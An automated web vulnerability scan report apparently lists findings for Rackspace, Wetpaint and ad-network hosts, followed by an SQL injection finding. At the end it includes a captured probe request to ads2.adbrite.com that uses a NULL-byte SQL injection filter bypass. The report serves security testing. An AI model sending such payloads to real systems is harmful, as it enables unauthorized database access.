15.34. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

15.35. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf

15.36. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf

15.37. http://um.adpredictive.com/amumatch

15.38. http://um.adpredictive.com/amumatch

15.39. http://um.adpredictive.com/amumatch

15.40. http://um.adpredictive.com/amumatch

15.41. http://www.addthis.com/bookmark.php

15.42. http://www.brinked.com/index.php

15.43. http://www.brinked.com/index.php

15.44. http://www.facebook.com/plugins/likebox.php

15.45. http://www.facebook.com/widgets/like.php

15.46. http://www.google.com/search

15.47. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

15.48. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

15.49. http://www.macromedia.com/shockwave/download/index.cgi

15.50. http://www.opnet.com/

15.51. http://www.rackspace-hosting.de/

15.52. http://www.rackspace.co.uk/

15.53. http://www.rackspace.co.za/

15.54. http://www.rackspace.com/apps

15.55. http://www.rackspace.com/index.php

15.56. http://www.rackspace.com/searchresults.php

15.57. http://www.rackspace.com/sitemap404.php

15.58. http://www.rackspace.com/sitemap404.php

15.59. http://www.rackspace.com/sitemap404.php

15.60. http://www.rackspacecloud.com/searchresults.php

16. Cross-domain script include

16.1. http://69.20.89.3/apps/blog/

16.2. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

16.3. http://ad.turn.com/server/ads.js

16.4. http://ad.turn.com/server/ads.js

16.5. http://ad.turn.com/server/ads.js

16.6. http://adobj.tmnetads.com/net/js/ad.js

16.7. http://ads2.adbrite.com/v0/ad

16.8. http://apps.rackspace.com/

16.9. https://apps.rackspace.com/

16.10. http://gigaom.com/2010/06/22/cloud-computing/

16.11. http://gigaom.com/2010/06/22/cloud-computing/

16.12. http://gigaom.com/2010/06/22/cloud-computing/

16.13. http://go.rackspace.com/rseawhitepaper.html

16.14. http://htcwiki.wetpaint.com/

16.15. http://htcwiki.wetpaint.com/account/ellerburnes

16.16. http://htcwiki.wetpaint.com/account/heidianna

16.17. http://htcwiki.wetpaint.com/account/scottpj

16.18. http://htcwiki.wetpaint.com/accountSearch/all

16.19. http://htcwiki.wetpaint.com/contact

16.20. http://htcwiki.wetpaint.com/forum

16.21. http://htcwiki.wetpaint.com/news

16.22. http://htcwiki.wetpaint.com/page/About+HTC

16.23. http://htcwiki.wetpaint.com/page/About+Smartphones

16.24. http://htcwiki.wetpaint.com/page/About+the+HTC+Wiki

16.25. http://htcwiki.wetpaint.com/page/Accessories

16.26. http://htcwiki.wetpaint.com/page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically

16.27. http://htcwiki.wetpaint.com/page/Aunsoft+Thanksgiving+Videos

16.28. http://htcwiki.wetpaint.com/page/Best+HTC+Video+Converter

16.29. http://htcwiki.wetpaint.com/page/HTC%20Apache%20(Sprint%20PPC%206700)

16.30. http://htcwiki.wetpaint.com/page/HTC%20Atlas%20(T-Mobile%20Wing)

16.31. http://htcwiki.wetpaint.com/page/HTC%20Touch%20Pro%202%20(T7373)

16.32. http://htcwiki.wetpaint.com/page/HTC+ALPINE

16.33. http://htcwiki.wetpaint.com/page/HTC+Artemis

16.34. http://htcwiki.wetpaint.com/page/HTC+BLUE+ANGEL

16.35. http://htcwiki.wetpaint.com/page/HTC+Fuze

16.36. http://htcwiki.wetpaint.com/page/HTC+Fuze+Reviews

16.37. http://htcwiki.wetpaint.com/page/HTC+Fuze+Wi-Fi

16.38. http://htcwiki.wetpaint.com/page/HTC+HD2+customization

16.39. http://htcwiki.wetpaint.com/page/HTC+Hero

16.40. http://htcwiki.wetpaint.com/page/HTC+Mogul

16.41. http://htcwiki.wetpaint.com/page/HTC+Mogul+Reviews

16.42. http://htcwiki.wetpaint.com/page/HTC+Pocket+PCs

16.43. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Questions

16.44. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/diff/452,453

16.45. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/file

16.46. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/history

16.47. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/links

16.48. http://htcwiki.wetpaint.com/page/HTC+Smartphones

16.49. http://htcwiki.wetpaint.com/page/HTC+Touch+HD++problem

16.50. http://htcwiki.wetpaint.com/page/HTC+Touch+Pro

16.51. http://htcwiki.wetpaint.com/page/HTC+Touch+Pro+Reviews

16.52. http://htcwiki.wetpaint.com/page/HTC+Touch+Reviews

16.53. http://htcwiki.wetpaint.com/page/How+to+Put+Blu-ray+DVD+movies+and+Videos+to+HTC+Epic+4G

16.54. http://htcwiki.wetpaint.com/page/How+to+Put+Videos+to+HTC+Evo+on+Mac

16.55. http://htcwiki.wetpaint.com/page/How+to+get+to+NYP

16.56. http://htcwiki.wetpaint.com/page/Max+Commodity

16.57. http://htcwiki.wetpaint.com/page/News%20&%20Notes

16.58. http://htcwiki.wetpaint.com/page/News+&+Notes

16.59. http://htcwiki.wetpaint.com/page/Smartphone+Blogs+and+Forums

16.60. http://htcwiki.wetpaint.com/page/Smartphone+Chat

16.61. http://htcwiki.wetpaint.com/page/Smartphone+How-To

16.62. http://htcwiki.wetpaint.com/page/Smartphone+ROMs

16.63. http://htcwiki.wetpaint.com/page/Smartphone+Software

16.64. http://htcwiki.wetpaint.com/page/T+Mobile+G1

16.65. http://htcwiki.wetpaint.com/page/T-Mobile+Dash+3G

16.66. http://htcwiki.wetpaint.com/page/T-Mobile+Shadow

16.67. http://htcwiki.wetpaint.com/page/The+Chart+of+You

16.68. http://htcwiki.wetpaint.com/page/Touch+Pro2+unable+to+delete+text

16.69. http://htcwiki.wetpaint.com/page/Unlock%20Vodafone%20&%20Etisalat%20Egypt%20Wireless%20Router%20Modem%20HUAWEI%20E960

16.70. http://htcwiki.wetpaint.com/page/Verizon+Ozone

16.71. http://htcwiki.wetpaint.com/page/Viewing+Video+on+the+Mogul

16.72. http://htcwiki.wetpaint.com/page/XT9+default+words

16.73. http://htcwiki.wetpaint.com/page/android+phones+thru+t-mobile

16.74. http://htcwiki.wetpaint.com/page/anyone+know+an+apt+for+mpegs

16.75. http://htcwiki.wetpaint.com/page/arabic+software+for+htc+touch+hd

16.76. http://htcwiki.wetpaint.com/page/backup+contacts+to+computer

16.77. http://htcwiki.wetpaint.com/page/convert+bluray+dvd+to+htc

16.78. http://htcwiki.wetpaint.com/page/download+wi-fi+for+p3400i

16.79. http://htcwiki.wetpaint.com/page/email+a+question+about+an+htc+PRODUCT

16.80. http://htcwiki.wetpaint.com/page/hdmi+output

16.81. http://htcwiki.wetpaint.com/page/how+i+add+arabic+software+to+my+htc+touch+hd

16.82. http://htcwiki.wetpaint.com/page/how+to+turn+off+screen+lock

16.83. http://htcwiki.wetpaint.com/page/imagio+remote+desktop

16.84. http://htcwiki.wetpaint.com/page/innovation

16.85. http://htcwiki.wetpaint.com/page/internet+problems+with+my+htc+hd2.

16.86. http://htcwiki.wetpaint.com/page/picture+text+for+htc+touch

16.87. http://htcwiki.wetpaint.com/page/reset+password+for+my+cingular+8125

16.88. http://htcwiki.wetpaint.com/page/root+HTC+EVO+4G

16.89. http://htcwiki.wetpaint.com/page/sprint+htc+touch+pro2

16.90. http://htcwiki.wetpaint.com/page/sync+htc+desire+with+outlook+in+windows+7

16.91. http://htcwiki.wetpaint.com/page/t8282+operating+system

16.92. http://htcwiki.wetpaint.com/privacy

16.93. http://htcwiki.wetpaint.com/search

16.94. http://htcwiki.wetpaint.com/search/everything/thread

16.95. http://htcwiki.wetpaint.com/sitemap

16.96. http://htcwiki.wetpaint.com/tag/Android

16.97. http://htcwiki.wetpaint.com/tag/Device+home+page

16.98. http://htcwiki.wetpaint.com/tag/HTC

16.99. http://htcwiki.wetpaint.com/tag/Home

16.100. http://htcwiki.wetpaint.com/tag/Home+page

16.101. http://htcwiki.wetpaint.com/tag/Pocket+PC

16.102. http://htcwiki.wetpaint.com/tag/Smartphone

16.103. http://htcwiki.wetpaint.com/terms

16.104. http://htcwiki.wetpaint.com/whatsnew

16.105. http://ir.rackspace.com/phoenix.zhtml

16.106. http://jquery.com/

16.107. http://jquery.org/license

16.108. http://jqueryui.com/about

16.109. http://jqueryui.com/themeroller/

16.110. https://login.wetpaint.com/login.do

16.111. https://login.wetpaint.com/register.do

16.112. https://my.rackspace.com/portal/auth/login

16.113. https://my.rackspace.com/portal/auth/phone

16.114. https://my.rackspace.com/portal/registration/index

16.115. https://signup.apps.rackspace.com/

16.116. http://tag.admeld.com/ad/iframe/297/wetpaintv1/160x600/technology-atf

16.117. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

16.118. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

16.119. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

16.120. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf

16.121. http://twitter.com/htc

16.122. http://twitter.com/rackapps

16.123. http://twitter.com/rackspace

16.124. http://www.addthis.com/bookmark.php

16.125. http://www.brinked.com/

16.126. http://www.brinked.com/index.php

16.127. http://www.brinked.com/index.php

16.128. http://www.brinked.com/xd_receiver.htm

16.129. http://www.building43.com/

16.130. http://www.facebook.com/%s

16.131. http://www.facebook.com/2008/fbml

16.132. http://www.facebook.com/2008/fbml

16.133. http://www.facebook.com/plugins/likebox.php

16.134. http://www.facebook.com/widgets/like.php

16.135. http://www.facebook.com/widgets/like.php

16.136. https://www.google.com/adsense/support/bin/request.py

16.137. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

16.138. http://www.opensource.org/licenses/mit-license.php

16.139. http://www.quantcast.com/p-c0xFC9HiPwWw-

16.140. http://www.rackspace-hosting.de/

16.141. http://www.rackspace.co.uk/

16.142. http://www.rackspace.co.uk/cloud-hosting/

16.143. http://www.rackspace.co.za/

16.144. http://www.rackspace.com/apps

16.145. http://www.rackspace.com/apps/

16.146. http://www.rackspace.com/apps/backup_and_collaboration/

16.147. http://www.rackspace.com/apps/backup_and_collaboration/data_backup_software/

16.148. http://www.rackspace.com/apps/backup_and_collaboration/online_file_storage/

16.149. http://www.rackspace.com/apps/blog/

16.150. http://www.rackspace.com/apps/blog/2010/06/increase_productivity_with_free_training/

16.151. http://www.rackspace.com/apps/careers/

16.152. http://www.rackspace.com/apps/contact_us/

16.153. http://www.rackspace.com/apps/contact_us/email_sales/

16.154. http://www.rackspace.com/apps/control_panel/

16.155. http://www.rackspace.com/apps/customers/

16.156. http://www.rackspace.com/apps/email_hosting/

16.157. http://www.rackspace.com/apps/email_hosting/compare/

16.158. http://www.rackspace.com/apps/email_hosting/email_archiving/

16.159. http://www.rackspace.com/apps/email_hosting/exchange_hosting/

16.160. http://www.rackspace.com/apps/email_hosting/exchange_hosting/on_your_mobile/

16.161. http://www.rackspace.com/apps/email_hosting/exchange_hybrid/

16.162. http://www.rackspace.com/apps/email_hosting/migrations/

16.163. http://www.rackspace.com/apps/email_hosting/rackspace_email/

16.164. http://www.rackspace.com/apps/email_hosting/rackspace_email/on_your_mobile/

16.165. http://www.rackspace.com/apps/email_hosting_service_planning_guide/

16.166. http://www.rackspace.com/apps/email_industry_leadership/

16.167. http://www.rackspace.com/apps/email_marketing_solutions/

16.168. http://www.rackspace.com/apps/email_provider/

16.169. http://www.rackspace.com/apps/fanatical_support/

16.170. http://www.rackspace.com/apps/file_sharing/

16.171. http://www.rackspace.com/apps/file_sharing/hosted_sharepoint/

16.172. http://www.rackspace.com/apps/reseller_program/

16.173. http://www.rackspace.com/apps/search/results/

16.174. http://www.rackspace.com/apps/submit_idea/

16.175. http://www.rackspace.com/apps/support

16.176. http://www.rackspace.com/apps/support/webinar_calendar

16.177. http://www.rackspace.com/apps/support/webinar_calendar/

16.178. http://www.rackspace.com/apps/why_hosted_apps/

16.179. http://www.rackspace.com/blog/

16.180. http://www.rackspace.com/blogs/index.php

16.181. http://www.rackspace.com/forms/contactsales.php

16.182. http://www.rackspace.com/forms/contactsalesconfirmation.php

16.183. http://www.rackspace.com/forms/logorequest.php

16.184. http://www.rackspace.com/forms/solutionpartnerapplication.php

16.185. http://www.rackspace.com/hosting_knowledge/

16.186. http://www.rackspace.com/hosting_solutions.php

16.187. http://www.rackspace.com/index.php

16.188. http://www.rackspace.com/information/aboutus.php

16.189. http://www.rackspace.com/information/contactus.php

16.190. http://www.rackspace.com/information/events/briefingprogram.php

16.191. http://www.rackspace.com/information/events/index.php

16.192. http://www.rackspace.com/information/events/industryevents.php

16.193. http://www.rackspace.com/information/events/rackgivesback.php

16.194. http://www.rackspace.com/information/hosting101/index.php

16.195. http://www.rackspace.com/information/index.php

16.196. http://www.rackspace.com/information/legal/clouddriveterms.php

16.197. http://www.rackspace.com/information/legal/generalterms.php

16.198. http://www.rackspace.com/information/legal/index.php

16.199. http://www.rackspace.com/information/legal/mailterms.php

16.200. http://www.rackspace.com/information/legal/privacystatement.php

16.201. http://www.rackspace.com/information/legal/sharepointappterms.php

16.202. http://www.rackspace.com/information/links.php

16.203. http://www.rackspace.com/information/newsroom/

16.204. http://www.rackspace.com/managed_hosting/

16.205. http://www.rackspace.com/managed_hosting/configurations.php

16.206. http://www.rackspace.com/managed_hosting/dedicated_servers.php

16.207. http://www.rackspace.com/managed_hosting/ecommerce/index.php

16.208. http://www.rackspace.com/managed_hosting/index.php

16.209. http://www.rackspace.com/managed_hosting/managed_colocation/index.php

16.210. http://www.rackspace.com/managed_hosting/private_cloud/index.php

16.211. http://www.rackspace.com/managed_hosting/richmedia/index.php

16.212. http://www.rackspace.com/managed_hosting/saas/index.php

16.213. http://www.rackspace.com/managed_hosting/services/database/index.php

16.214. http://www.rackspace.com/managed_hosting/services/index.php

16.215. http://www.rackspace.com/managed_hosting/services/proservices/criticalsites.php

16.216. http://www.rackspace.com/managed_hosting/services/proservices/disasterrecovery.php

16.217. http://www.rackspace.com/managed_hosting/services/proservices/sharepoint.php

16.218. http://www.rackspace.com/managed_hosting/services/security/index.php

16.219. http://www.rackspace.com/managed_hosting/services/storage/index.php

16.220. http://www.rackspace.com/managed_hosting/support/customers/index.php

16.221. http://www.rackspace.com/managed_hosting/support/dedicatedteam.php

16.222. http://www.rackspace.com/managed_hosting/support/index.php

16.223. http://www.rackspace.com/managed_hosting/support/promise.php

16.224. http://www.rackspace.com/managed_hosting/support/servicelevels/index.php

16.225. http://www.rackspace.com/managed_hosting/websites/index.php

16.226. http://www.rackspace.com/partners/index.php

16.227. http://www.rackspace.com/partners/partnersearch.php

16.228. http://www.rackspace.com/searchresults.php

16.229. http://www.rackspace.com/sitemap.php

16.230. http://www.rackspace.com/sitemap404.php

16.231. http://www.rackspace.com/whyrackspace/expertise/index.php

16.232. http://www.rackspace.com/whyrackspace/index.php

16.233. http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php

16.234. http://www.rackspace.com/whyrackspace/network/datacenters.php

16.235. http://www.rackspace.com/whyrackspace/network/index.php

16.236. http://www.rackspace.com/whyrackspace/support/index.php

16.237. http://www.rackspace.dk/

16.238. http://www.rackspace.nl/

16.239. http://www.rackspacecloud.com/aboutus/contact/

16.240. http://www.rackspacecloud.com/aboutus/events/

16.241. http://www.rackspacecloud.com/aboutus/story/

16.242. http://www.rackspacecloud.com/blog/

16.243. http://www.rackspacecloud.com/blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/

16.244. http://www.rackspacecloud.com/cloudU/

16.245. http://www.rackspacecloud.com/cloud_hosting_demos/

16.246. http://www.rackspacecloud.com/cloud_hosting_faq/

16.247. http://www.rackspacecloud.com/cloud_hosting_products/

16.248. http://www.rackspacecloud.com/cloud_hosting_products/files/

16.249. http://www.rackspacecloud.com/cloud_hosting_products/servers/

16.250. http://www.rackspacecloud.com/cloud_hosting_products/sites/

16.251. http://www.rackspacecloud.com/index.php

16.252. http://www.rackspacecloud.com/legal/

16.253. http://www.rackspacecloud.com/legal/privacystatement/

16.254. http://www.rackspacecloud.com/managed_cloud/

16.255. http://www.rackspacecloud.com/partners/

16.256. http://www.rackspacecloud.com/resellers/

16.257. http://www.rackspacecloud.com/searchresults.php

16.258. http://www.rackspacecloud.com/what_is_cloud_computing/

16.259. http://www.rackspacecloud.com/who_uses_cloud_computing/

16.260. http://www.rackspacehosting.no/

16.261. http://www.rackspacehosting.se/

16.262. http://www.search.com/

16.263. http://www.wetpaint.com/americas-next-top-model

16.264. http://www.wetpaint.com/castle

16.265. http://www.wetpaint.com/greys-anatomy

16.266. http://www.wetpaint.com/hellcats

16.267. http://www.wetpaint.com/nikita

16.268. http://www.wetpaint.com/the-vampire-diaries

16.269. http://www.wetpaintcentral.com/page/Help

16.270. http://www.zagg.com/invisibleshield/cell-phone/htc

17. File upload functionality

18. TRACE method is enabled

18.1. http://69.20.89.3/

18.2. http://sizzlejs.com/

18.3. http://www.informationweek.com/

18.4. http://www.rackspace-hosting.de/

19. Email addresses disclosed

19.1. http://ads.adbrite.com/adserver/vdi/742697

19.2. http://ads2.adbrite.com/v0/ad

19.3. http://ads2.adbrite.com/v0/ad

19.4. http://ads2.adbrite.com/v0/ad

19.5. http://ads2.adbrite.com/v0/ad

19.6. http://blog.deconcept.com/2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/

19.7. http://blog.deconcept.com/2006/07/28/swfobject-143-released/

19.8. http://feeds.feedburner.com/TheWebmailBlog

19.9. http://htcwiki.wetpaint.com/page/HTC+HD2+customization

19.10. http://htcwiki.wetpaint.com/page/HTC+Smartphone+Wiki/history

19.11. http://htcwiki.wetpaint.com/page/HTC+Touch+Pro+Reviews

19.12. http://htcwiki.wetpaint.com/page/Smartphone+Software

19.13. http://htcwiki.wetpaint.com/page/The+Chart+of+You

19.14. http://htcwiki.wetpaint.com/page/Unlock%20Vodafone%20&%20Etisalat%20Egypt%20Wireless%20Router%20Modem%20HUAWEI%20E960

19.15. http://htcwiki.wetpaint.com/page/anyone+know+an+apt+for+mpegs

19.16. http://htcwiki.wetpaint.com/page/imagio+remote+desktop

19.17. http://htcwiki.wetpaint.com/page/picture+text+for+htc+touch

19.18. http://htcwiki.wetpaint.com/page/root+HTC+EVO+4G

19.19. http://htcwiki.wetpaint.com/page/t8282+operating+system

19.20. http://htcwiki.wetpaint.com/rss2_0/pageReport/updated

19.21. http://htcwiki.wetpaint.com/tag/HTC

19.22. http://htcwiki.wetpaint.com/tag/Pocket+PC

19.23. http://htcwiki.wetpaint.com/terms

19.24. http://i.ubm-us.net/shared/omniture/h_s_code_remote.js

19.25. http://jqueryui.com/about

19.26. http://positioniseverything.net/easyclearing.html

19.27. https://rackspace.hs.llnwd.net/o26/portal/js/plugins.js

19.28. http://twitter.com/rackapps

19.29. http://twitter.com/rackspace

19.30. http://www.brinked.com/templates/rating_medium.css

19.31. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

19.32. http://www.opensource.org/licenses/mit-license.php

19.33. http://www.rackspace.com/hosting_knowledge/

19.34. http://www.rackspace.com/includes/omniture/s_code.js

19.35. http://www.rackspace.com/information/contactus.php

19.36. http://www.rackspace.com/information/events/industryevents.php

19.37. http://www.rackspace.com/information/legal/generalterms.php

19.38. http://www.rackspace.com/information/legal/privacystatement.php

19.39. http://www.rackspacecloud.com/aboutus/contact/

19.40. http://www.rackspacecloud.com/cloud_hosting_faq/

19.41. http://www.rackspacecloud.com/legal/

19.42. http://www.rackspacecloud.com/legal/privacystatement/

19.43. http://www.rackspacecloud.com/resellers/

19.44. http://www.rackspacecloud.com/script/i2a.js

19.45. http://www.rackspacecloud.com/who_uses_cloud_computing/

20. Private IP addresses disclosed

20.1. http://htcwiki.wetpaint.com/tag/Device+home+page

20.2. http://htcwiki.wetpaint.com/tag/Home

20.3. http://htcwiki.wetpaint.com/tag/Home+page

21. Robots.txt file

21.1. http://045-qrg-025.mktoresp.com/webevents/visitWebPage

21.2. http://blog.deconcept.com/swfobject/

21.3. http://books.google.com/books/api.js

21.4. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

21.5. http://gigaom.com/2010/06/22/cloud-computing/

21.6. http://htcwiki.wetpaint.com/

21.7. http://iad.wm.emailsrvr.com/

21.8. http://images.google.com/images

21.9. http://jqueryui.com/about

21.10. http://news.google.com/nwshp

21.11. https://www.google.com/cse/tools/ping

21.12. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

21.13. http://www.omniture.com/

21.14. http://www.rackertalent.com/

21.15. http://www.rackspace-hosting.de/

22. Cacheable HTTPS response

22.1. https://apps.rackspace.com/

22.2. https://apps.rackspace.com/login.php

22.3. https://beta.cp.rackspace.com/ForgotPassword.aspx

22.4. https://beta.cp.rackspace.com/Login.aspx

22.5. https://cp.rackspace.com/ForgotPassword.aspx

22.6. https://cp.rackspace.com/Login.aspx

22.7. https://iad.wm.emailsrvr.com/mail6/

22.8. https://login.wetpaint.com/login.do

22.9. https://login.wetpaint.com/register.do

22.10. https://login.wetpaint.com/requestPasswordReset.do

22.11. https://manage.rackspacecloud.com/Login.do

22.12. https://manage.rackspacecloud.com/pages/Login.jsp

22.13. https://manage.rackspacecloud.com/pages/login_help.jsp

22.14. https://manage.rackspacecloud.com/pages/user_help.jsp

22.15. https://maps-api-ssl.google.com/maps

22.16. https://maps-api-ssl.google.com/maps/api/js

22.17. https://my.rackspace.com/portal/auth/login

22.18. https://my.rackspace.com/portal/auth/phone

22.19. https://my.rackspace.com/portal/registration/index

22.20. https://signup.apps.rackspace.com/

22.21. https://signup.rackspacecloud.com/signup

22.22. https://www.google.com/adsense/support/bin/request.py

23. HTML does not specify charset

23.1. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

23.2. http://ads.addynamix.com/creative/2-2126953-88j

23.3. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126

23.4. http://amch.questionmarket.com/adscgen/sta.php

23.5. http://apps.rackspace.com/

23.6. http://apps.rackspace.com/ext/login/submit.php

23.7. http://apps.rackspace.com/login.php

23.8. https://apps.rackspace.com/

23.9. https://apps.rackspace.com/login.php

23.10. http://attached-wapi.wetpaint.com/

23.11. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

23.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.13. http://forums.brinked.com/clientscript/fbconnect.js

23.14. http://forums.brinked.com/clientscript/yui/connection/connection-min.js

23.15. http://forums.brinked.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js

23.16. http://iad.wm.emailsrvr.com/

23.17. http://iad.wm.emailsrvr.com/login.php

23.18. https://iad.wm.emailsrvr.com/mail6/

23.19. http://image.wetpaint.com/

23.20. http://jqueryui.com/about

23.21. http://jqueryui.com/themeroller/

23.22. http://m.rackspace.com/mail6/login.php

23.23. http://m.rackspace.com/mail6/mobile/index.php

23.24. http://media.match.com/cookE/geoip/iframe

23.25. http://pixel.quantserve.com/seg/r

23.26. http://spe.redcated/ds/U500ARDHTRDH/

23.27. http://status.apps.rackspace.com/

23.28. http://tag.admeld.com/ad/iframe/0/0/0/ros

23.29. http://tag.admeld.com/ad/iframe/297/wetpaintv1/160x600/technology-atf

23.30. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf

23.31. http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf

23.32. http://web.survey-poll.com/

23.33. http://www.brinked.com/ajaxfileupload.js

23.34. http://www.brinked.com/ajaxtabs.js

23.35. http://www.brinked.com/jquery.js

23.36. http://www.brinked.com/js/bsn.AutoSuggest_2.1.3.js

23.37. http://www.brinked.com/xd_receiver.htm

23.38. http://www.google.com/nexus/#utm_campaign=us/

23.39. http://www.informationweek.com/news/software/hosted/showArticle.jhtml

24. HTML uses unrecognised charset

25. Content type incorrectly stated

25.1. http://active.macromedia.com/flash2/cabs/swflash.cab

25.2. http://admeld.lucidmedia.com/clicksense/admeld/match

25.3. http://ads.addynamix.com/creative/2-2126953-88j

25.4. http://ads.keewurd.com/js/psAdsProc.ashx

25.5. http://amch.questionmarket.com/adscgen/sta.php

25.6. http://apps.rackspace.com/ext/login/submit.php

25.7. http://apps.rackspace.com/login.php

25.8. https://apps.rackspace.com/login.php

25.9. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

25.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.11. http://c1776742.cdn.cloudfiles.rackspacecloud.com/images/IS/MH_Sales_en_US/invitation/background.gif

25.12. http://c1776742.cdn.cloudfiles.rackspacecloud.com/images/IS/MH_Sales_en_US/invitation/close.gif

25.13. http://create.wetpaint.com/scripts/wptrk

25.14. http://event.adxpose.com/event.flow

25.15. http://forums.brinked.com/clientscript/fbconnect.js

25.16. http://forums.brinked.com/clientscript/yui/connection/connection-min.js

25.17. http://forums.brinked.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js

25.18. http://forums.brinked.com/image.php

25.19. http://gs.instantservice.com/geoipAPI.js

25.20. http://iad.wm.emailsrvr.com/login.php

25.21. http://js.admeld.com/meld120.js/

25.22. http://m.rackspace.com/mail6/login.php

25.23. https://maps-api-ssl.google.com/maps/api/js

25.24. http://maps.google.com/maps/api/js

25.25. http://media.match.com/click.ng

25.26. http://media.match.com/cookE/geoip/iframe

25.27. http://servedby.adxpose.com/adxpose/find_ad.js/

25.28. http://um.adpredictive.com/amumatch

25.29. http://www.brinked.com/ajaxfileupload.js

25.30. http://www.brinked.com/ajaxtabs.js

25.31. http://www.brinked.com/jquery.js

25.32. http://www.brinked.com/js/bsn.AutoSuggest_2.1.3.js

25.33. http://www.rackspace.com/apps/favicon.ico

26. Content type is not specified

27. SSL certificate

27.1. https://beta.cp.rackspace.com/

27.2. https://cp.rackspace.com/

27.3. https://my.rackspace.com/

27.4. https://www.google.com/



1. SQL injection  next
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ads2.adbrite.com/v0/ad [zs parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v0/ad?sid=1397994&zs=3732385f3930%00'&ifr=2&ref=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
